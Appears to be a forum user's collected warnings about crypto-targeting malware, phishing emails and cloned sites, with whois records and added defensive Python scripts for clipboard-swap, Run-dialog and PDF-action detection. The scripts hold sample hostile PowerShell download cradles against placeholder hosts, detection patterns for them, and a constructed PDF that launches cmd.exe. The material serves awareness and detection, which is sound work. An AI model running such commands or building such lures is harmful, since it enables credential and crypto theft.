Show Posts
A new version of Triada was recently discovered by Kaspersky. Per their analysis, it has already been able to transfer $270,000 in various cryptocurrencies, but the numbers could be higher as this malware also targets Monero. It is a type of clipboard malware, which is why it was so easy for them to trap their victims: they could not have suspected that anything was changed when they made their transactions. One way they lure their victims is by offering mobile phones that are cheap but come laden with this malware, so no one suspects anything until it is too late. Below are the capabilities of this malware:
● steal user accounts in instant messengers and social networks, in particular Telegram and TikTok;
● secretly send messages allegedly on behalf of the victim in WhatsApp and Telegram, and also delete them to erase traces;
● steal cryptocurrency by replacing crypto wallet addresses in the required applications;
● monitor the victim's activity in browsers and replace links;
● replace numbers during calls - to redirect the subscriber to the contact needed by the attackers;
● control SMS: intercept, send and delete messages;
● allow sending premium SMS to receive paid services;
● download and run other programs on the infected smartphone;
● block network connections, for example, to interfere with the operation of anti-fraud systems.
https://www.kaspersky.ru/about/press-releases/novaya-versiya-triada-kradyot-kriptovalyutu-akkaunty-v-messendzherah-i-podmenyaet-nomera-telefonov-vo-vremya-zvonkov
And it fits perfectly with what we have learned so far in crypto: if it is too good to be true, then it probably is. So just buy your phone from an authorized dealer and don't be trapped by those cheap offers you can find online, as you could be the next victim.
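Added example (not from the Kaspersky report or the post above): the address-swap trick the post describes is detectable from the clipboard itself. The script below assumes the clipboard is polled and every change is recorded as (seconds, text); a clipper overwrites a freshly copied address within milliseconds, while a person seldom copies two different addresses of the same coin within a couple of seconds. The address patterns, the 2-second window and the sample events are all assumptions constructed for this example.

```python
"""Clipboard-swap ("clipper") detector over a stream of clipboard snapshots.
Added example, not Kaspersky's code: it assumes the clipboard is polled and
each change is recorded as (seconds_since_start, text)."""
import re
from dataclasses import dataclass

# Loose shape checks, enough to recognise an address and its coin family;
# they do not validate checksums.
ADDRESS_PATTERNS = {
    "BTC": re.compile(r"^(bc1[a-z0-9]{25,87}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$"),
    "ETH": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "XMR": re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$"),
}


def classify(text):
    """Return the coin family an address-looking string belongs to, else None."""
    text = text.strip()
    for coin, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return coin
    return None


@dataclass
class SwapAlert:
    at: float
    coin: str
    copied: str
    replaced_with: str


def detect_clipper(events, window=2.0):
    """events: (t, text) clipboard changes in time order.

    A person seldom copies two different addresses of the same coin within
    `window` seconds; a clipper overwrites the clipboard within milliseconds
    of the victim's copy, so that pattern is what we flag."""
    alerts = []
    prev = None  # (t, text, coin) of the previous clipboard change
    for t, text in events:
        coin = classify(text)
        if prev is not None and coin is not None:
            pt, ptext, pcoin = prev
            if pcoin == coin and ptext.strip() != text.strip() and (t - pt) <= window:
                alerts.append(SwapAlert(t, coin, ptext.strip(), text.strip()))
        prev = (t, text, coin)
    return alerts


def same_address(copied, pasted):
    """Compare the address you copied with the one in the send field before confirming."""
    return copied.strip() == pasted.strip()


# Constructed sample: the victim copies a real address at 1.20 s and a clipper
# replaces it 50 ms later. The two later ETH copies are 31 s apart (normal use).
SAMPLE_EVENTS = [
    (0.00, "invoice #4411"),
    (1.20, "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq"),
    (1.25, "bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4"),
    (9.00, "0xd8dA6BF26964aF9D7eEd9e03E53415D37aA96045"),
    (40.0, "0x" + "0" * 39 + "1"),
]

if __name__ == "__main__":
    for a in detect_clipper(SAMPLE_EVENTS):
        print(f"[{a.at:.2f}s] {a.coin} address swapped: {a.copied} -> {a.replaced_with}")
```

On the phone itself you cannot run this, which is the point of the post: the only check left to you is same_address(), i.e. reading the pasted address back against the one you meant to send to before you confirm.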
There is a new malware called Arcane stealer. It's a variant of the Phemedrone Stealer malware. One way it spreads is through YouTube: the attackers promote a game hack, usually in Russian. The video has a link to a password-protected archive file, and once you unlock the archive, there is a batch file and UnRAR.exe. So it's not just a cryptominer; it also targets login credentials, passwords, credit card data, and cookies from various Chromium- and Gecko-based browsers. Its targets include crypto wallets as well:
- VPN clients: OpenVPN, Mullvad, NordVPN, IPVanish, Surfshark, Proton, hidemy.name, PIA, CyberGhost, ExpressVPN
- Network clients and utilities: ngrok, Playit, Cyberduck, FileZilla, DynDNS
- Messaging apps: ICQ, Tox, Skype, Pidgin, Signal, Element, Discord, Telegram, Jabber, Viber
- Email clients: Outlook
- Gaming clients and services: Riot Client, Epic, Steam, Ubisoft Connect (ex-Uplay), Roblox, Battle.net, various Minecraft clients
- Crypto wallets: Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, Atomic, Guarda, Coinomi
https://securelist.com/arcane-stealer/115919/
And again, we shouldn't be downloading anything from unknown sources, especially game cheats like this one.
It seems that there is a new wave of Coinbase phishing email attacks like the one below. From the looks of it, it seems very legit, but upon closer inspection, the source of the email is very suspicious. The thing is, this is a clever approach by the attackers, and the reverse of what we have been seeing before: there is no phishing link that, when you click or download it, installs malware that steals your credentials, like your passphrase. Here, the attackers give you a 12-digit mnemonic phrase and let you transfer all your crypto to that wallet, and once you transfer it, there could be a bot that automatically moves it to a new wallet the attackers control. So if you get this email, delete it, as this is an obvious phishing email from the attackers.
https://gbhackers.com/fake-coinbase-migration-messages-target-users/
It seems that criminals have shifted their focus to a new trend: many people are searching for PDFs, and then you are redirected to a site where you need to fill in a fake CAPTCHA. "As Netskope Threat Labs extends its hunt for phishing campaigns leveraging PDFs, fake CAPTCHAs, and SEO poisoning, we observed more than 260 unique domains hosting phishing PDF files. While Webflow leads all domains for hosting phishing PDFs, other noteworthy content delivery domains include GoDaddy, Strikingly, Wix, and Fastly. Notably, three of the top 15 domains are content delivery networks related to GoDaddy, which are wsimg.com, s123-cdn-static.com, and f-static.net."
The cyber criminals' attack starts when victims go to online libraries like https://pdfcoffee.com/ https://pdf4pro.com/ https://pdfbean.org/
So once you go to one of these websites, search for something and unfortunately download a PDF that is poisoned with malware like in this example, most likely it comes with a Lumma stealer. "Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell."
So this is just a warning for those who are downloading PDFs from other sites: when you see a CAPTCHA, you have to think twice before downloading or executing anything, as you might be the next victim here.
https://www.netskope.com/blog/fake-captchas-malicious-pdfs-seo-traps-leveraged-for-user-manual-searches
https://x.com/vxunderground/status/1881946956806926351
Just want to give everyone a heads-up regarding the news about Ross Ulbricht being freed by the Trump administration. There is a set of threat actors who are taking advantage of it on X. They use fake but verified Ross Ulbricht accounts on X, then direct people to malicious Telegram channels presenting themselves as official Ulbricht portals. After you are redirected there, you are walked through a fake verification process named "Safeguard". Then a mini app automatically copies a PowerShell command and instructs you to open the Windows Run dialog and paste that command, which eventually downloads a zip file with a Cobalt Strike loader (https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike). So never ever download it, or execute it, or run it in a dialog. Even if you are a so-called advanced user, you don't know what's inside that PowerShell command or that zip file.
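Added example (not from the vx-underground post, the Netskope write-up or the "Safeguard" campaign): both the fake CAPTCHA pages and the fake "Safeguard" verification end the same way, with the victim pasting a PowerShell one-liner into Win+R. Whatever was pasted shows up in process-creation telemetry as a shell spawned by explorer.exe with a download-and-run command line, and that is what this triage script scores. The Sysmon-style field names, the indicator list and the four sample events are assumptions constructed for this example.

```python
"""Flags the "paste this into Win+R" pattern (fake CAPTCHA / fake
"Safeguard" verification pages) in process-creation telemetry. Added
example, not from the linked posts: the records below are constructed
Sysmon-style events, and the field names are assumed."""
import re

# Win+R and the Run dialog spawn the command as a child of explorer.exe
SUSPICIOUS_PARENTS = {"explorer.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Traits common to one-liners copied from a web page (matched on the
# lowercased command line)
INDICATORS = [
    (r"-(?:w|win|window|windowstyle)\s+hidden", "hidden window"),
    (r"-(?:e|ec|enc|encodedcommand)\s+[a-z0-9+/=]{20,}", "encoded command"),
    (r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget|start-bitstransfer)\b",
     "download cradle"),
    (r"\b(?:iex|invoke-expression)\b", "in-memory execution"),
    (r"https?://", "remote URL"),
    (r"\b(?:expand-archive|tar\s+-x)\b", "archive extraction"),
]


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def score_event(ev):
    """Return (count, labels) of indicators present in one process-creation event."""
    if basename(ev.get("Image", "")) not in SHELL_IMAGES:
        return 0, []
    if basename(ev.get("ParentImage", "")) not in SUSPICIOUS_PARENTS:
        return 0, []
    cmd = ev.get("CommandLine", "").lower()
    hits = [label for pattern, label in INDICATORS if re.search(pattern, cmd)]
    return len(hits), hits


def triage(events, threshold=2):
    """Return [(ProcessId, labels)] for events reaching `threshold` indicators."""
    flagged = []
    for ev in events:
        count, hits = score_event(ev)
        if count >= threshold:
            flagged.append((ev["ProcessId"], hits))
    return flagged


# Constructed sample telemetry
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    # the pasted one-liner: hidden window, download, remote URL, archive extraction
    {"ProcessId": 5532, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://example.invalid/a.zip -OutFile '
                    '$env:TEMP\\a.zip; Expand-Archive $env:TEMP\\a.zip $env:TEMP"'},
    # an admin typing a harmless command into Run
    {"ProcessId": 6010, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell Get-ChildItem C:\\Users"},
    # same cradle, but launched by a build tool rather than the Run dialog
    {"ProcessId": 6200, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Tool\build.exe",
     "CommandLine": "powershell -w hidden -c iwr https://internal.example/build.ps1 | iex"},
]

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS):
        print(pid, ", ".join(hits))
```

The parent-process filter is what keeps this quiet: the same cradle launched by a build tool (last event) is left for a different rule. After the fact, the Run dialog keeps its history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is the first place to look on a host where someone admits to having pasted "a verification command".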
It was unraveled that there was a malicious app on Google Play targeting crypto enthusiasts, and obviously it is designed for mobile devices, which many of us use. It has good evasion techniques, which is why it stayed under the radar for quite some time (five months) and could already have victimized many. One method it uses is exploiting the trusted name of the "WalletConnect" protocol. It also had a group of people making fake reviews, which is why it got 10,000 downloads and even ranked high in search engines. It is said that it was able to drain crypto users of about $70,000 before being caught and removed.
https://research.checkpoint.com/2024/wallet-scam-a-case-study-in-crypto-drainer-tactics/
And it seems that these criminals are shifting to mobile-device kinds of attacks. So we should really be careful with anything we download, especially crypto apps from the Google store, and we should verify everything first before connecting our wallets. Although this one has been taken down, these criminals are surely not going to stop and could be coming up with another kind of download.
Europol has reported that it has taken down a major international criminal network engaged in unlocking stolen or lost mobile phones through a phishing platform. Investigators reported 483 000 victims worldwide, who had attempted to regain access to their phones and been phished in the process. The victims are mainly Spanish-speaking nationals from European, North American and South American countries.
The successful operation took place thanks to international cooperation between law enforcement and judiciary authorities from Spain, Argentina, Chile, Colombia, Ecuador and Peru.
The action week took place between 10 and 17 September and resulted in 17 arrests, 28 searches and 921 items seized, mainly mobile phones but also other electronic devices, vehicles and weapons.
https://www.europol.europa.eu/media-press/newsroom/news/criminal-phishing-network-resulting-in-over-480-000-victims-worldwide-busted-in-spain-and-latin-america
I guess this is a big win for Europol in their fight against cyber criminals. They are a big group, and we can see that they've victimized almost half a million people around Lat-Am alone. Hopefully more criminal gangs will be taken out by the authorities, especially those who target crypto enthusiasts.
A new clipboard malware has emerged and is exclusively targeting Italy via a phishing campaign. Below is the infection chain: The email usually comes from a German email address that looks really legit, and it has an invoice attachment embedded in a link. Once you click it, it redirects you to a malicious website, and once the Zip archive is opened, it downloads and then deploys a dropper, a multi-functional RAT payload. Its functionalities include the following: So it has capabilities that are very dangerous to crypto enthusiasts, as it can act as a clipper malware and then steal our passwords as well, so not just in crypto but also in banking apps that we have on our systems. Take note that right now it targets Italy, but the code of the malware itself is Brazilian or Portuguese-speaking, so this might evolve later to target Lat-Am.
https://securelist.com/sambaspy-rat-targets-italian-users/113851/
I'm pretty sure that the majority of us have used PDFs before and have used either Adobe Acrobat PDF reader or the alternative Foxit PDF reader. The latter was recently used by cyber criminals to deliver their malware, and as crypto enthusiasts we are somewhat among the targets, as it includes a crypto miner and targets crypto wallets. First you might receive this kind of email, and if you click on the attached link, you might see the below: And once you click "OK", a second pop-up will appear. And if you are unsuspecting about everything and then click "Open", it will then download and execute the malware's payload. This is all the system information that these hackers are going to get from you: And as recommended: "Until the software update is applied, Foxit users are advised to remain vigilant about potential exploitation and adhere to classic defense practices. To mitigate the risks of being affected by such threats, it is essential to:
- Keep operating systems and applications updated through timely patches and other means.
- Be cautious of unexpected emails with links, especially from unknown senders.
- Enhance cybersecurity awareness among employees.
- Consult security specialists for any doubts or uncertainties."
This is just a heads-up; we are really exposed to this cyber threat now as we approach the bull run, so everyone should be very careful.
https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/
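Added example (not Check Point's or Foxit's code, and not a reproduction of the specific lure in the report): a PDF that pops a dialog and then runs something when you click "Open" carries an action entry somewhere in its object tree, so the first thing to do with a PDF attachment you are unsure about is to look for those action keywords before opening it in any reader. The scanner below does that as a static pass, including inside Flate-compressed streams where a plain grep would miss them. The three PDF byte strings are constructed for this example and the keyword list is an assumption; a hit means "look closer", not "malicious".

```python
"""Static first-pass triage of a PDF for the action keywords that can open a
dialog, launch a program or fetch a payload when the file opens. Added
example, not Check Point's or Foxit's code: the PDF byte strings below are
constructed, and a keyword hit only means "look closer", not "malicious"."""
import re
import zlib

RISKY_KEYS = [b"/OpenAction", b"/AA", b"/Launch", b"/JavaScript", b"/JS",
              b"/URI", b"/EmbeddedFile", b"/SubmitForm", b"/GoToR", b"/RichMedia"]

STREAM_RE = re.compile(rb"stream\r?\n(.*?)\nendstream", re.S)
LAUNCH_TARGET_RE = re.compile(rb"/S\s*/Launch[^>]*?/F\s*\((.*?)\)", re.S)


def inflate_streams(data):
    """Return the concatenated contents of every Flate-compressed stream that
    decompresses cleanly, so keywords inside object streams are not missed."""
    chunks = []
    for m in STREAM_RE.finditer(data):
        try:
            # decompressobj tolerates trailing bytes such as a stray \r
            chunks.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            pass  # not Flate-compressed, or not a stream we can read
    return b"".join(chunks)


def triage_pdf(data):
    if not data.startswith(b"%PDF-"):
        raise ValueError("not a PDF header")
    haystack = data + inflate_streams(data)
    keywords = {}
    for key in RISKY_KEYS:
        # the lookahead keeps /JS from also matching /JavaScript
        n = len(re.findall(re.escape(key) + rb"(?![A-Za-z])", haystack))
        if n:
            keywords[key.decode()] = n
    targets = [t.decode(errors="replace") for t in LAUNCH_TARGET_RE.findall(haystack)]
    return {
        "keywords": keywords,
        "launch_targets": targets,
        "verdict": "suspicious" if keywords else "no action keywords",
    }


# Constructed sample 1: the catalog's /OpenAction points at a /Launch action,
# i.e. the reader is asked to run cmd.exe as soon as the document opens.
SUSPICIOUS_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    b"4 0 obj << /Type /Action /S /Launch /Win << /F (cmd.exe) "
    b"/P (/c start https://example.invalid/payload) >> >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

# Constructed sample 2: nothing but a catalog and an empty page tree.
BENIGN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

# Constructed sample 3: a /Launch action hidden in a Flate-compressed object
# stream, which a plain grep over the raw file would never see.
_hidden = zlib.compress(b"<< /Type /Action /S /Launch /F (calc.exe) >>")
COMPRESSED_PDF = (
    b"%PDF-1.5\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"5 0 obj << /Type /ObjStm /Length " + str(len(_hidden)).encode()
    + b" /Filter /FlateDecode >>\nstream\n" + _hidden + b"\nendstream\nendobj\n"
    b"%%EOF\n"
)

if __name__ == "__main__":
    for name, pdf in [("suspicious", SUSPICIOUS_PDF), ("benign", BENIGN_PDF),
                      ("compressed", COMPRESSED_PDF)]:
        print(name, triage_pdf(pdf))
```

Real-world files are messier (cross-reference streams, encrypted documents, keywords split with hex escapes such as /Laun#63h), so treat a clean result from this as a first pass, not a clearance; a "suspicious" result is reason enough not to click "OK" and "Open".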
I'm pretty sure that the Twitter hack is still fresh in our memory. It was high-profile because it involved a lot of crypto exchanges, like @coinbase, @Gemini, and @binance, and celebrities: @JeffBezos, @BarackObama, @elon_musk, @JoeBiden, @BillGates, and @WarrenBuffett. Graham Ivan Clark was charged last year and on Tuesday agreed to be sentenced as a youthful offender to three years in prison plus three years of probation. Here are the official docs:
https://www.documentcloud.org/documents/20515610-plea-agreement-acknowledgment-of-waiver-of-rights-bc-6f018852-673e-4df1-85da-4c5629856265
https://www.sao13th.com/2021/03/prosecutors-reach-plea-agreement-in-case-of-twitter-hacker-graham-clark/ (please note that access might be blocked for some regions due to security reasons).
What are your thoughts on the sentencing? He has already served seven months of the three-year sentence.
I was quite surprised to see this error; actually it was my first time seeing this kind of message from this forum. I've been here for some time now, so I'm wondering if others have seen this kind of error message before. I know that you can just refresh to restore the tab, but I'm just curious. Note: this coincides with bitcoin hitting $40k again, so probably there are a lot of online users right now causing this kind of error.
I saw this post of @Xal0lex here, and it didn't take long to identify another fake site.
Original: https://[banned mixer]/en/
Archive: https://archive.is/qrVRM
Registrant: REDACTED FOR PRIVACY
Registrant Country: gb
Registrar: 1API GmbH, IANA ID: 1387, URL: http://www.1api.net, Whois Server: whois.1api.net
Registrar Status: clientTransferProhibited
Dates: 23 days old; Created on 2020-12-27; Expires on 2021-12-27; Updated on 2021-01-01
IP Address: 104.18.40.235 - 462 other sites hosted on this server
Image of the fake site below; you can't see any difference visually, can you? So be very careful, this is another warning to all of us: mixers are prime targets as well. And even though this mixer is not that well-known (this is the first time I've heard of it), we will never know.
What happened: Fake OnX Swap website
Website:
Archived: https://archive.is/sdFcr
Original website: https://app.onx.finance/dashboard
Whois Record for OnXSwap.online
Registrant Org: Not Applicable
Registrant Country: us
Registrar: Hostinger, UAB, IANA ID: 1636, Whois Server: whois.hostinger.com
Registrar Status: clientTransferProhibited, serverTransferProhibited
Dates: 14 days old; Created on 2020-12-29; Expires on 2021-12-30; Updated on 2021-01-03
Name Servers: NS1.DNS-PARKING.COM (has 815,330 domains), NS2.DNS-PARKING.COM (has 815,330 domains)
IP Address: 151.106.97.138 - 62 other sites hosted on this server
IP Location: Germany - Bayern - Nuremberg - Hostinger International Limited
ASN: Germany AS47583 AS-HOSTINGER, CY (registered Apr 04, 2011)
IP History: 1 change on 1 unique IP addresses over 1 years
Hosting History: 1 change on 2 unique name servers over 1 year
Tornado cash - https://tornado.cash/, "a non-custodial Ethereum and ERC20 privacy solution based on zkSNARKs. It improves transaction privacy by breaking the on-chain link between the recipient and destination addresses", is now being cloned as well by cyber actors. The fake website:
Archived: https://archive.is/zYvKT
Registrant Org: WhoisGuard, Inc.
Registrant Country: pa
Registrar: NameCheap, Inc., IANA ID: 1068, URL: http://www.namecheap.com, Whois Server: whois.namecheap.com
Registrar Status: serverTransferProhibited
Dates: 37 days old; Created on 2020-12-06; Expires on 2021-12-06; Updated on 2020-12-06
IP Address: 104.31.77.95 - -1 other site is hosted on this server
The real website is: https://app.tornado.cash/. And this is how it looks: Almost the same, and it's hard to distinguish initially. This is the official GitHub repo: https://github.com/tornadocash/tornado-core
What happened: New Bustabit phishing site
Website:
Archive: https://archive.is/C0tx9
Whois Record for BustaBit.cam
Registrant Org: WhoisGuard, Inc.
Registrant Country: pa
Registrar: Namecheap, IANA ID: 1068, URL: https://namecheap.com, Whois Server: whois.namecheap.com
Registrar Status: addPeriod, clientTransferProhibited, serverTransferProhibited
Dates: 1 day old; Created on 2021-01-10; Expires on 2022-01-10; Updated on 2021-01-10
IP Address: 63.250.38.6 - 534 other sites hosted on this server
It seems that the attacks on bustabit continue, like this one, a website just 1 day old, freshly created by these criminals to take advantage of those who use Google to search for bustabit games.
What happened: Fake Balancer website
Website: https://bolancer.exchange/
Original Website: https://balancer.exchange/#/swap
Image of fake website:
Whois Record for BoLancer.exchange
Registrant: REDACTED FOR PRIVACY
Registrant Org: See PrivacyGuardian.org
Registrant Country: us
Registrar: NameSilo, LLC, IANA ID: 1479, URL: http://www.namesilo.com, Whois Server: www.namesilo.com/whois.php
Registrar Status: clientTransferProhibited
Dates: 14 days old; Created on 2020-12-27; Expires on 2021-12-27; Updated on 2021-01-01
IP Address: 172.67.190.61 - 21 other sites hosted on this server
There is another fake blockchain.com, which is just 4 days old; actually it was a redirection from: to
Archive: https://archive.is/J3Nyv
Registrant: WhoisGuard Protected
Registrant Org: WhoisGuard, Inc.
Registrant Country: pa
Registrar: NAMECHEAP INC NameCheap, Inc., IANA ID: 1068, URL: http://www.namecheap.com, Whois Server: whois.namecheap.com
Registrar Status: addPeriod, clientTransferProhibited
Dates: 4 days old; Created on 2020-11-21; Expires on 2021-11-21; Updated on 0000-12-31
IP Address: 209.97.129.163 is hosted on a dedicated server
So watch out for this kind of attack; we need to be very careful as the price of bitcoin is almost at an all-time high again. And I need everyone to help me report this website to: https://safebrowsing.google.com/safebrowsing/report_phish/?hl=en or directly to the domain registrar: https://support.namecheap.com/index.php?/Tickets/Submit -> Abuse Reports -> Fraud / Phishing
There is a phishing site for Foxmixer.com. It might not be a popular mixing service, but they have their ANN thread here: ✰ [ANN] FoxMixer.com ✰✰✰ The High Quality Bitcoin Mixer ✰✰✰ 3+ Years Online ✰
Website: www.xn--foxmixr-y8a.com (https://www.foxmixėr.com/)
The real website is: https://www.foxmixer.com/
Whois Record for Foxmixėr.com
IP Address: 198.54.116.178 - 730 other sites hosted on this server
IP Location: United States Of America - Georgia - Atlanta - Namecheap Inc.
ASN: United States Of America AS22612 NAMECHEAP-NET, US (registered Jun 21, 2011)
Domain Status: Never Registered Before
IP History: 1 change on 1 unique IP addresses over 0 years
Registrar History: 1 registrar
Hosting History: 1 change on 2 unique name servers over 0 year
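Added example (not from any of the linked sites or whois tools): the clones in these posts fall into three shapes, a one-letter typo (bolancer.exchange, bustabit.cam), a homoglyph hidden behind punycode (xn--foxmixr-y8a.com is foxmixėr.com) and a brand wrapped in a new name (onxswap.online). The script below runs those three checks against a watch list of domains you actually use: it decodes IDN labels, folds diacritics and common confusables into a "skeleton", and measures edit distance. LEGIT, the confusable table and the distance threshold are assumptions you would tune for your own list.

```python
"""Lookalike-domain checks for phishing clones like the ones in these posts:
punycode/IDN decoding, folding of visually confusable characters and edit
distance against domains you actually use. Added example, not from any of
the linked sites or tools; LEGIT, the confusable table and the distance
threshold are assumptions you would tune for your own watch list."""
import unicodedata

LEGIT = ["balancer.exchange", "app.tornado.cash", "bustabit.com",
         "foxmixer.com", "blockchain.com", "app.onx.finance"]

# Common visual confusables, applied after diacritics are stripped
CONFUSABLES = {"0": "o", "1": "l", "rn": "m", "vv": "w", "ı": "i"}


def decode_idn(domain):
    """xn--foxmixr-y8a.com -> foxmixėr.com; ASCII labels pass through."""
    labels = []
    for label in domain.split("."):
        if label.startswith("xn--"):
            try:
                label = label.encode("ascii").decode("idna")
            except UnicodeError:
                pass  # leave malformed punycode as it is
        labels.append(label)
    return ".".join(labels)


def skeleton(domain):
    """Lowercase, strip diacritics (ė -> e) and fold confusables, so that
    two names that look alike compare equal."""
    s = unicodedata.normalize("NFKD", domain.lower())
    s = "".join(ch for ch in s if not unicodedata.combining(ch))
    for src, dst in CONFUSABLES.items():
        s = s.replace(src, dst)
    return s


def levenshtein(a, b):
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(domain):
    """Crude eTLD+1 (last two labels); fine for the TLDs in these posts,
    wrong for co.uk-style suffixes."""
    return ".".join(domain.split(".")[-2:])


def check(domain, legit=LEGIT, max_dist=1):
    decoded = decode_idn(domain.lower().rstrip("."))
    base = registrable(decoded)
    sk = skeleton(base)
    best = None  # (distance, legit registrable domain)
    for l in legit:
        lb = registrable(l)
        if base == lb:
            return {"domain": domain, "decoded": decoded, "verdict": "legitimate",
                    "closest": lb, "distance": 0}
        d = levenshtein(sk, skeleton(lb))
        if best is None or d < best[0]:
            best = (d, lb)
    dist, closest = best
    # legit brands (first label of the registrable domain) appearing inside the candidate's name
    brand_hits = [registrable(l) for l in legit
                  if registrable(l).split(".")[0] in base.split(".")[0]]
    if dist == 0:
        verdict = "homoglyph"      # identical after folding, yet a different domain
    elif dist <= max_dist:
        verdict = "typosquat"
    elif brand_hits:
        verdict, closest = "brand-in-name", brand_hits[0]   # e.g. onxswap.online
    else:
        verdict = "no match"
    return {"domain": domain, "decoded": decoded, "verdict": verdict,
            "closest": closest, "distance": dist}


if __name__ == "__main__":
    for d in ["bolancer.exchange", "www.xn--foxmixr-y8a.com", "bustabit.cam",
              "onxswap.online", "app.tornado.cash", "example.org"]:
        r = check(d)
        print(f"{d:28} {r['decoded']:22} {r['verdict']:14} closest={r['closest']} dist={r['distance']}")
```

The whois fields in these posts (age in days, privacy-proxy registrant, hundreds of sites on the same IP) are the second half of the picture: a domain this script flags that was also registered a few days ago is about as clear a signal as you get without visiting it.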
Since PayPal has joined the cryptocurrency bandwagon, scammers were very quick to take advantage and created a website for a supposed PayPal giveaway. This is obviously fake and malicious, and its intention is to trap crypto enthusiasts and play with their emotions and greed. So please do not fall for this scheme.
Website:
Archived: https://archive.is/uuqT1
Bitcoin address: 1PAYPRAKcnQyqnLMA7WyLTyzWakXVidx6W
The address already has a balance of 0.00037650 BTC.
Registrant Org: Maslov Anatoliy Zaharovich
Registrant Country: ru
Registrar: Regional Network Information Center, JSC dba RU-CENTER, IANA ID: 463, URL: https://www.nic.ru/whois, Whois Server: https://www.nic.ru/whois
Registrar Status: clientTransferProhibited, serverTransferProhibited
Dates: 28 days old; Created on 2020-10-25; Expires on 2021-10-25; Updated on 2020-11-10
Name Servers: NS3.NIC.RU, NS4.NIC.RU, NS8.NIC.RU (each has 551,119 domains)
IP Address: 195.24.68.9 - 2,361 other sites hosted on this server
IP Location: Russian Federation - Moskva - Moscow - Jsc Ru-center
ASN: Russian Federation AS48287 RU-CENTER, RU (registered Nov 04, 2008)